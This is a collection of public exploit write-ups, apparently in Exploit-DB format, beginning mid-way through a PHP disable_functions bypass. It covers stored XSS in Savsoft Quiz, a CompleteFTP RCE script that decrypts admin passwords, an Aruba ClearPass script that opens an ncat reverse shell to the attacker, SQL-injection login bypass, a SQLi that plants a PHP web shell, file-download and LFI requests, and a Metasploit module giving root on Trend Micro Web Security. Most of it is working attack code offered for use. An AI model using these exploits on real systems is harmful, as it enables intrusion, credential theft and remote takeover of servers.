//$return_val = 0x0; // // XXX if we want return_val control
//$res = $helper($execute_data, $return_val); // XXX if we want return_val control
// --------------------------- end of call zif_system
}
pwn("touch /tmp/WIN2.txt");
?>
# Exploit Title: Savsoft Quiz 5 - Persistent Cross-Site Scripting
# Date: 2020-07-09
# Exploit Author: Ogulcan Unveren(th3d1gger)
# Vendor Homepage: https://savsoftquiz.com/
# Software Link: https://github.com/savsofts/savsoftquiz_v5.git
# Version: 5.0
# Tested on: Kali Linux
---Vulnerable Source Code----
function insert_user_2(){
$userdata=array(
'email'=>$this->input->post('email'),
'password'=>md5($this->input->post('password')),
'first_name'=>$this->input->post('first_name'),
'last_name'=>$this->input->post('last_name'),
'contact_no'=>$this->input->post('contact_no'),
'gid'=>implode(',',$this->input->post('gid')),
'su'=>'2'
);
$veri_code=rand('1111','9999');
if($this->config->item('verify_email')){
$userdata['verify_code']=$veri_code;
}
if($this->session->userdata('logged_in_raw')){
$userraw=$this->session->userdata('logged_in_raw');
$userraw_uid=$userraw['uid'];
$this->db->where('uid',$userraw_uid);
$rresult=$this->db->update('savsoft_users',$userdata);
if($this->session->userdata('logged_in_raw')){
$this->session->unset_userdata('logged_in_raw');
}
}else{
$rresult=$this->db->insert('savsoft_users',$userdata);
$uid=$this->db->insert_id();
foreach($_POST['custom'] as $ck => $cv){
if($cv != ''){
$savsoft_users_custom=array(
'field_id'=>$ck,
'uid'=>$uid,
'field_values'=>$cv
);
$this->db->insert('savsoft_users_custom',$savsoft_users_custom);
}
}
----Vulnerable Request---
POST /index.php/login/insert_user/ HTTP/1.1
Host: savsoftquiz_v5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2/index.php/login/registration/
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Cookie: ci_session=0lhlr1iv1qgru1u1kmg42lbvj8mprokv
Upgrade-Insecure-Requests: 1
email=hello%40gmail.com&password=password&first_name=XSSPAYLOAD&last_name=test&contact_no=05785555555&gid%5B%5D=1
# Exploit Title: CompleteFTP Professional < 12.1.3 - Remote Code Execution
# Date: 2020-03-11
# Exploit Author: 1F98D
# Original Author: Rhino Security Labs
# Vendor Homepage: https://enterprisedt.com/products/completeftp/
# Version: CompleteFTP Professional
# Tested on: Windows 10 (x64)
# CVE: CVE‑2019‑16116
# References:
# https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/
# https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-16116
#
# CompleteFTP before 12.1.3 logs an obscured administrator password to a file
# during installation (C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log)
# if CompleteFTP is configured to permit remote administration (over port 14983) it
# is possible to obtain remote code execution through the administration interface
#
# This script requires the following python modules are installed
# pip install paramiko pycryptodome uuid
#
#!/usr/local/bin/python3
from paramiko.sftp import CMD_EXTENDED
from base64 import b64encode, b64decode
from Crypto.Util.Padding import unpad
from Crypto.Cipher import DES3
import xml.etree.ElementTree as ET
import paramiko
import struct
import uuid
import sys
# region get_server_info
get_server_info = """
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<i2:GetServerInfo id="ref-1" xmlns:i2="Admin API">
</i2:GetServerInfo>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""".strip()
# endregion
# region update_config
update_config = """
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<i2:UpdateConfig id="ref-1" xmlns:i2="Admin API">
<changes href="#ref-4"/>
</i2:UpdateConfig>
<a1:ConfigDataSet id="ref-4" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/EnterpriseDT.Net.FtpServer.Config/CompleteFTPManager%2C%20Version%3D8.3.3.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D48e55b33069804ce">
<DataSet.RemotingVersion href="#ref-5"/>
<XmlSchema id="ref-6">{XMLSCHEMA}</XmlSchema>
<XmlDiffGram id="ref-7">{XMLDIFFGRAM}</XmlDiffGram>
</a1:ConfigDataSet>
<a2:Version id="ref-5" xmlns:a2="http://schemas.microsoft.com/clr/ns/System">
<_Major>2</_Major>
<_Minor>0</_Minor>
<_Build>-1</_Build>
<_Revision>-1</_Revision>
</a2:Version>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
""".strip()
# endregion
# region xml_schema
xml_schema = """
<?xml version="1.0" encoding="utf-16"?>
<xs:schema id="ConfigDataSet" targetNamespace="http://tempuri.org/ConfigDataSet.xsd" xmlns:mstns="http://tempuri.org/ConfigDataSet.xsd" xmlns="http://tempuri.org/ConfigDataSet.xsd" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:msprop="urn:schemas-microsoft-com:xml-msprop" attributeFormDefault="qualified" elementFormDefault="qualified">
<xs:element name="ConfigDataSet" msdata:IsDataSet="true" msdata:Locale="en-US" msdata:TimestampingEnabled="False">
<xs:complexType>
<xs:choice minOccurs="0" maxOccurs="unbounded">
<xs:element name="PlugIn">
<xs:complexType>
<xs:sequence>
<xs:element name="PlugInID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
<xs:element name="Name" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
<xs:simpleType>
<xs:restriction base="xs:string">
<xs:maxLength value="100" />
</xs:restriction>
</xs:simpleType>
</xs:element>
<xs:element name="ClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd">
<xs:simpleType>
<xs:restriction base="xs:string">
<xs:maxLength value="400" />
</xs:restriction>
</xs:simpleType>
</xs:element>
<xs:element name="PlugInTypeID" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
<xs:element name="Configuration" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
<xs:element name="CreatedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
<xs:element name="ModifiedTime" type="xs:dateTime" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
<xs:element name="UserInstance" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
<xs:element name="System" type="xs:boolean" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" />
<xs:element name="EditorClassName" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
<xs:simpleType>
<xs:restriction base="xs:string">
<xs:maxLength value="100" />
</xs:restriction>
</xs:simpleType>
</xs:element>
<xs:element name="AssemblyPath" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0">
</xs:element>
<xs:element name="MinimumEdition" type="xs:int" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
<xs:element name="ChangeSetID" msdata:DataType="System.Guid, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" type="xs:string" msdata:targetNamespace="http://tempuri.org/ConfigDataSet.xsd" minOccurs="0" />
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="Server">
<xs:complexType>
</xs:complexType>
</xs:element>
<xs:element name="SiteUser">
<xs:complexType>
</xs:complexType>
</xs:element>
<xs:element name="Site">
<xs:complexType>
</xs:complexType>
</xs:element>
<xs:element name="Node">
<xs:complexType>
</xs:complexType>
</xs:element>
<xs:element name="TrashHeap1">
<xs:complexType>
</xs:complexType>
</xs:element>
<xs:element name="TrashHeap2">
<xs:complexType>
</xs:complexType>
</xs:element>
<xs:element name="ChangeSet">
<xs:complexType>
</xs:complexType>
</xs:element>
<xs:element name="RuntimeVariable">
<xs:complexType>
</xs:complexType>
</xs:element>
</xs:choice>
</xs:complexType>
<xs:unique name="PlugIn_Constraint1" msdata:ConstraintName="Constraint1" msdata:PrimaryKey="true">
<xs:selector xpath=".//mstns:PlugIn" />
<xs:field xpath="mstns:PlugInID" />
</xs:unique>
</xs:element>
</xs:schema>
""".replace("<", "<").replace(">", ">").replace('"', """).strip()
# endregion
# region xml_diffgram
xml_diffgram = """
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<ConfigDataSet xmlns="http://tempuri.org/ConfigDataSet.xsd">
<PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" diffgr:hasChanges="modified">
<PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
<Name>Process Execution</Name>
<ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
<PlugInTypeID>2</PlugInTypeID>
<Configuration>{CONFIGURATION}</Configuration>
<CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
<ModifiedTime>2020-03-10T10:52:00.7496654+08:00</ModifiedTime>
<UserInstance>false</UserInstance>
<System>true</System>
<ChangeSetID>{ID}</ChangeSetID>
</PlugIn>
<PlugInType diffgr:id="PlugInType1" msdata:rowOrder="0">
<PlugInTypeID>2</PlugInTypeID>
<Name>Event</Name>
<CreatedTime>2009-06-29T11:48:00+08:00</CreatedTime>
<ModifiedTime>2009-06-29T11:48:00+08:00</ModifiedTime>
</PlugInType>
<ChangeSet diffgr:id="ChangeSet1" msdata:rowOrder="0">
<ChangeSetID></ChangeSetID>
<Sequence>3</Sequence>
<CreatedTime>2020-03-10T10:50:44.4209655+08:00</CreatedTime>
<ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
<IsPrimary>true</IsPrimary>
</ChangeSet>
</ConfigDataSet>
<diffgr:before>
<PlugIn diffgr:id="PlugIn1" msdata:rowOrder="0" xmlns="http://tempuri.org/ConfigDataSet.xsd">
<PlugInID>88428040-73b3-4497-9b6d-69af2f1cc3c7</PlugInID>
<Name>Process Execution</Name>
<ClassName>EnterpriseDT.Net.FtpServer.Trigger.ProcessTrigger</ClassName>
<PlugInTypeID>2</PlugInTypeID>
<Configuration></Configuration>
<CreatedTime>2020-03-10T18:33:41.107+08:00</CreatedTime>
<ModifiedTime>2020-03-10T10:50:44.4209655+08:00</ModifiedTime>
<UserInstance>false</UserInstance>
<System>true</System>
<ChangeSetID></ChangeSetID>
</PlugIn>
</diffgr:before>
</diffgr:diffgram>
""".strip()
# endregion
# region config
config = """
<TriggerDataSet xmlns="http://tempuri.org/TriggerDataSet.xsd">
<ProcessConfig>
<ProcessConfigID>0</ProcessConfigID>
<MaxProcesses>10</MaxProcesses>
<RunTimeout>0</RunTimeout>
<QueueTimeout>0</QueueTimeout>
<KillOnExit>true</KillOnExit>
</ProcessConfig>
<ProcessRule>
<ProcessRuleID>1</ProcessRuleID>
<ProcessConfigID>0</ProcessConfigID>
<Name>trigger</Name>
<Enabled>true</Enabled>
<ProcessType>0</ProcessType>
<ProcessPath>cmd.exe</ProcessPath>
<Arguments>/c {CMD}</Arguments>
<PathFilter>*</PathFilter>
<OnError>false</OnError>
<OnSuccess>true</OnSuccess>
<RowOrder>1</RowOrder>
</ProcessRule>
<ProcessEvent>
<ProcessRuleID>1</ProcessRuleID>
<EventType>LogIn</EventType>
</ProcessEvent>
</TriggerDataSet>
""".strip()
# endregion
def prepare_update_config(uuid, cmd):
config_payload = config
config_payload = config_payload.replace('{CMD}', cmd)
config_payload = config_payload.replace('<', '<')
config_payload = config_payload.replace('>', '>')
diffgram_payload = xml_diffgram
diffgram_payload = diffgram_payload.replace('{CONFIGURATION}', config_payload)
diffgram_payload = diffgram_payload.replace('{ID}', uuid)
diffgram_payload = diffgram_payload.replace('&', '&')
diffgram_payload = diffgram_payload.replace('<', '<')
diffgram_payload = diffgram_payload.replace('>', '>')
diffgram_payload = diffgram_payload.replace('"', '"')
payload = update_config
payload = payload.replace('{XMLSCHEMA}', xml_schema)
payload = payload.replace('{XMLDIFFGRAM}', diffgram_payload)
return payload
def send_request(sftp, payload):
payload = b64encode(bytes(payload, 'utf-8')).decode('utf-8')
res = sftp._request(CMD_EXTENDED, 'admin@enterprisedt.com', 'SOAP64 ' + payload)
return res
def convert_changeset_id_to_uuid(changeset_id):
a = struct.pack('i', int(changeset_id[0].text)) # 32
b = struct.pack('h', int(changeset_id[1].text)) # 16
c = struct.pack('h', int(changeset_id[2].text)) # 16
d = struct.pack('B', int(changeset_id[3].text)) # 8
e = struct.pack('B', int(changeset_id[4].text)) # 8
f = struct.pack('B', int(changeset_id[5].text)) # 8
g = struct.pack('B', int(changeset_id[6].text)) # 8
h = struct.pack('B', int(changeset_id[7].text)) # 8
i = struct.pack('B', int(changeset_id[8].text)) # 8
j = struct.pack('B', int(changeset_id[9].text)) # 8
k = struct.pack('B', int(changeset_id[10].text)) # 8
x = a + b + c + d + e + f + g + h + i + j + k
return uuid.UUID(bytes_le=x)
def get_uuid(sftp):
res = send_request(sftp, get_server_info)
if res[0] != 201:
print('[!] Error could not request server info via SFTP')
sys.exit(1)
res = b64decode(res[1].get_string()).decode('utf-8')
res = ET.fromstring(res)
changeset_id = res.find('.//SyncChangeSetID')
uuid = convert_changeset_id_to_uuid(changeset_id)
return str(uuid)
def login(host, port, user, password):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, port, user, password, look_for_keys=False, allow_agent=False)
return ssh.open_sftp()
def send_command(sftp, cmd):
uuid = get_uuid(sftp)
payload = prepare_update_config(uuid, cmd)
res = send_request(sftp, payload)
if res[0] != 201:
print('[!] Error could not send update config request via SFTP')
sys.exit(1)
def decrypt_password(password):
key = b64decode('HKVV76GdVuzXne/zxtWvdjA2d2Am548E')
iv = b64decode('gVGow/9uLvM=')
encrypted = b64decode(password)
cipher = DES3.new(key=key, iv=iv, mode=DES3.MODE_CBC)
decrypted = cipher.decrypt(encrypted)
return unpad(decrypted, 8).decode('utf-16')
if len(sys.argv) != 6:
print('[!] Missing arguments')
print('[ ] Usage: {} <target> <port> <username> <encrypted-password> <cmd>'.format(sys.argv[0]))
print("[ ] E.g. {} 192.168.1.128 14983 admin DEomw27OY7sYZs4XjYA2kVB4LEB5skN4 'whoami > C:\\x.txt'".format(sys.argv[0]))
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]
cmd = sys.argv[5]
print('[ ] Decrypting password')
password = decrypt_password(password)
print('[ ] Decrypted password is "{}"'.format(password))
print('[ ] Logging in')
sftp = login(target, port, username, password)
print('[ ] Sending command')
send_command(sftp, cmd)
print('[ ] Command successfully sent, triggering...')
sftp = login(target, port, username, password)
# Exploit Title: Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution
# Date: 2020-07-06
# Exploit Author: SpicyItalian
# Vendor Homepage: https://www.arubanetworks.com/products/security/network-access-control/
# Version: ClearPass 6.7.x prior to 6.7.13-HF, ClearPass 6.8.x prior to 6.8.5-HF, ClearPass 6.9.x prior to 6.9.1
# Tested on: ClearPass 6.7.0
# CVE: CVE-2020-7115
Use of RHEL/CentOS 7.x is recommended to successfully generate the malicious OpenSSL engine.
#!/usr/bin/env bash
if [ "$#" -ne 4 ]; then
echo "Usage: `basename $0` [remote host] [remote port] [local host] [local port]"
exit 0
fi
cat <<EOF >>payload.c
#include <unistd.h>
__attribute__((constructor))
static void init() {
execl("/bin/sh", "sh", "-c", "rm -f /tmp/clientCertFile*.txt ; sleep 1 ; ncat $3 $4 -e /bin/sh", NULL);
}
EOF
gcc -fPIC -c payload.c
gcc -shared -o payload.so -lcrypto payload.o
rm -f payload.c payload.o
curl -X POST -F 'clientPassphrase=req -engine /tmp/clientCertFile*.txt' -F 'uploadClientCertFile=@./payload.so' -k https://$1:$2/tips/tipsSimulationUpload.action &>/dev/null &
cat <<"EOF"
/(\
¡ !´\
| )\ `.
| `.) \,-,--
( / /
`'-.,;_/
`----
EOF
printf "\nPleasea waita for your spicy shell...\n\n"
ncat -v -l $3 $4
# Exploit Title: Barangay Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-07-05
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/13484/barangay-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/antiokz/barangay_1.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : index.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/Barangay/adminlogin.php
POST /Barangay/adminlogin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Referer: http://localhost/Barangay/
Cookie: PHPSESSID=jt0a3e89ukmktgtuoedjqmktge
Connection: keep-alive
Upgrade-Insecure-Requests: 1
admin_name=%27%3D%27%27or%27&admin_pass=%27%3D%27%27or%27&adminlogin=Login: undefined
HTTP/1.1 200 OK
Date: Sat, 04 Jul 2020 20:35:25 GMT
Server: Apache/2.4.39 (Win64) PHP/7.2.18
X-Powered-By: PHP/7.2.18
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 3638
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# Exploit Title: HelloWeb 2.0 - Arbitrary File Download
# Date: 2020-07-09
# Vendor Homepage: https://helloweb.co.kr/
# Version: 2.0 [Latest] and previous versions
# Exploit Author: bRpsd
# Contact Author: cy[at]live.no
# Google Dork: inurl:exec/file/download.asp
# Type: WebApps / ASP
-----------------------------------------------------
Vulnerable code:
######################################################################################################
Dim filepath, filename, root_path, fso, root_folder, attachfile, objStream, strFile
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = 1
objStream.LoadFromFile attachfile
Response.BinaryWrite objStream.Read
Response.Flush
######################################################################################################
Vulnerability: Arbitrary File Download
Location: http://localhost/exec/file/download.asp
Parameters: filename & filepath
Proof of concept:
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
RESPONSE:
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
# Exploit Title: Park Ticketing Management System 1.0 - 'viewid' SQL Injection
# Date: 2020-07-13
# Exploit Author: gh1mau
# Team Members: Capt'N,muzzo,chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10952
# Version: V1.0
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)
import requests
#this script is for POC purpose, you could add your own error checking mechanism
command = "whoami"
url = "http://localhost:80/ptms/view-normal-ticket.php?viewid=1%27%20UNION%20ALL%20SELECT%200x3c3f7068702073797374656d28245f524551554553545b276768316d6175275d293b203f3e,NULL,NULL,NULL,NULL,NULL,NULL%20INTO%20OUTFILE%20%27C:/UwAmp/www/ptms/1.php%27--%20-"
payload = ""
headers = {
"Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Connection": "close",
"Host": "localhost",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.5"
}
response = requests.request("GET", url, data=payload, headers=headers)
print("[+] Injecting Web Shell...\n")
url2 = "http://localhost:80/ptms/1.php?gh1mau=" + command
payload2 = ""
headers2 = {
"Cookie": "PHPSESSID=eabmes4rt7uger0dlqsljitjd6",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Connection": "close",
"Host": "localhost",
"Accept-Encoding": "gzip, deflate",
"Upgrade-Insecure-Requests": "1",
"Accept-Language": "en-US,en;q=0.5"
}
response2 = requests.request("GET", url2, data=payload2, headers=headers2)
print("Web Shell: " + url2)
print(response2.text)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Trend Micro Web Security (Virtual Appliance) Remote Code Execution',
'Description' => %q{
This module exploits multiple vulnerabilities together in order to achive a remote code execution.
Unauthenticated users can execute a terminal command under the context of the root user.
The specific flaw exists within the LogSettingHandler class of administrator interface software.
When parsing the mount_device parameter, the process does not properly validate a user-supplied string
before using it to execute a system call. An attacker can leverage this vulnerability to execute code in
the context of root. But authentication is required to exploit this vulnerability.
Another specific flaw exist within the proxy service, which listens on port 8080 by default. Unauthenticated users
can exploit this vulnerability in order to communicate with internal services in the product.
Last but not least a flaw exists within the Apache Solr application, which is installed within the product.
When parsing the file parameter, the process does not properly validate a user-supplied path prior to using it in file operations.
An attacker can leverage this vulnerability to disclose information in the context of the IWSS user.
Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the root user.
Version perior to 6.5 SP2 Patch 4 (Build 1901) are affected.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
],
'References' =>
[
['CVE', '2020-8604'],
['CVE', '2020-8605'],
['CVE', '2020-8606'],
['ZDI', '20-676'],
['ZDI', '20-677'],
['ZDI', '20-678']
],
'Privileged' => true,
'DefaultOptions' =>
{
'SSL' => true,
'payload' => 'python/meterpreter/reverse_tcp',
'WfsDelay' => 30
},
'Payload' =>
{
'Compat' =>
{
'ConnectionType' => '-bind'
}
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2020-06-10',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options(
[
Opt::RPORT(8443),
OptInt.new('PROXY_PORT', [true, 'Port number of Trend Micro Web Filter Proxy service', 8080])
]
)
end
def hijack_cookie
# Updating SSL and RPORT in order to communicate with HTTP proxy service.
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
port_restore = datastore['RPORT']
datastore['RPORT'] = datastore['PROXY_PORT']
@jsessionid = ''
# We are exploiting proxy service vulnerability in order to fetch content of catalina.out file
print_status('Trying to extract session ID by exploiting reverse proxy service')
res = send_request_cgi({
'method' => 'GET',
'uri' => "http://#{datastore['RHOST']}:8983/solr/collection0/replication",
'vars_get' => {
'command' => 'filecontent',
'wt' => 'filestream',
'generation' => 1,
'file' => '../' * 7 << 'var/iwss/tomcat/logs/catalina.out'
}
})
# Restore variables and validate extracted sessionid
datastore['SSL'] = true if ssl_restore
datastore['RPORT'] = port_restore
# Routine check on res object
unless res
fail_with(Failure::Unreachable, 'Target is unreachable.')
end
# If the res code is not 200 that means proxy service is not vulnerable.
unless res.code == 200
@jsessionid = -1
return
end
# Now we are going to extract all JESSIONID from log file and store them in array.
cookies = res.body.scan(/CheckUserLogon sessionid : (.*)/).flatten
if cookies.empty?
@jsessionid = 0
print_error('System is vulnerable, however a user session was not detected and is therefore unexploitable. Retry after a user logs in.')
return
end
print_good("Extracted number of JSESSIONID: #{cookies.length}")
# We gotta switch back to adminsitrator interface port instead of proxy service. Restore rport and ssl variables.
datastore['SSL'] = true if ssl_restore
datastore['RPORT'] = port_restore
# Latest cookie in the log file is the one most probably active. So that we use reverse on array.
cookies.reverse.each_with_index do |cookie, index|
print_status("Testing JSESSIONID ##{index} : #{cookie}")
# This endpoints is basically check session :)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('rest', 'commonlog', 'get_sessionID'),
'cookie' => "JSESSIONID=#{cookie}"
})
# Routine res check
unless res
fail_with(Failure::UnexpectedReply, 'Target is unreachable.')
end
# If the cookie is active !
if res.code == 200 && res.body.include?('session_flag')
print_good("Awesome!!! JESSIONID ##{index} is active.")
@jsessionid = cookie
break
end
print_warning("JSESSIONID ##{index} is inactive! Moving to the next one.")
end
if @jsessionid.empty?
print_error('System is vulnerable, however extracted cookies are not valid! Please wait for a user or admin to login.')
end
end
def check
#
# @jsessionid can be one of the following value
#
# -1 = Proxy service is not vulnerable, which means we'r not gonna
# be able to read catalina.out
#
# 0 = Proxy service is vulnerable, but catalina.out does not contain any
# jessionid string yet !
#
# empty = Proxy service is vulnerable, but jessionid within log file but
# none of them are valid:(
#
# string = Proxy service is vulnerable and sessionid is valid !
#
hijack_cookie
if @jsessionid == -1
CheckCode::Safe
else
CheckCode::Vulnerable
end
end
def exploit
unless check == CheckCode::Vulnerable
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
#
# 0 => Proxy service is vulnerable, but catalina.out does not contain any
# jessionid string yet !
#
# empty => Proxy service is vulnerable, but jessionid within log file but
# none of them are valid:(
#
if @jsessionid.empty? || @jessionid == 0
fail_with Failure::NoAccess, ''
end
print_status('Exploiting command injection vulnerability')
# Yet another app specific bypass is going on here.
# It's so buggy to make the cmd payloads work under the following circumstances (Weak blacklisting, double escaping etc)
# For that reason, I am planting our payload dropper within the perl command.
cmd = "python -c \"#{payload.encoded}\""
final_payload = cmd.to_s.unpack1('H*')
p = "perl -e 'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
vars_post = {
mount_device: "mount $(#{p}) /var/offload",
cmd: 'mount'
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'commonlog', 'log_setting', 'mount_device'),
'cookie' => "JSESSIONID=#{@jsessionid}",
'ctype' => 'application/json',
'data' => vars_post.to_json
})
end
end
# Exploit title: BSA Radar 1.6.7234.24750 - Local File Inclusion
# Date: 2020-07-08
# Exploit Author: William Summerhill
# Vendor homepage: https://www.globalradar.com/
# Version: BSA Radar - Version 1.6.7234.24750 and lower
# CVE-2020-14946 - Local File Inclusion
# Description: The Administrator section of the Surveillance module in Global RADAR - BSA Radar 1.6.7234.X
# and lower allows users to download transaction files. When downloading the files,
# a user is able to view local files on the web server by manipulating the FileName
# and FilePath parameters in the URL, or while using a proxy. This vulnerability could
# be used to view local sensitive files or configuration files on the backend server.
Vulnerable endpoint: /UC/downloadFile.ashx
The current user is required to have valid privileges to send requests to the target vulnerable endpoint.
Proof of Concept:
HTTP Request PoC:
VALID REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=SOMEFILE.TXT&UploadStyle=1&UploadStyle=1&UploadSource=6
LFI EXPLOIT REQUEST:
GET /UC/downloadFile.ashx?ID=XXXX&FileName=C:\Windows\debug\NetSetup.log&UploadStyle=1&UploadSource=6
The entire LFI path can be injected into the "FileName" parameter in order to enumerate existing files on the server. Other LFI files can be tested (such as the Windows hosts file) for further verification and disclosures.
Tested on: Windows
CVE: CVE-2020-14946
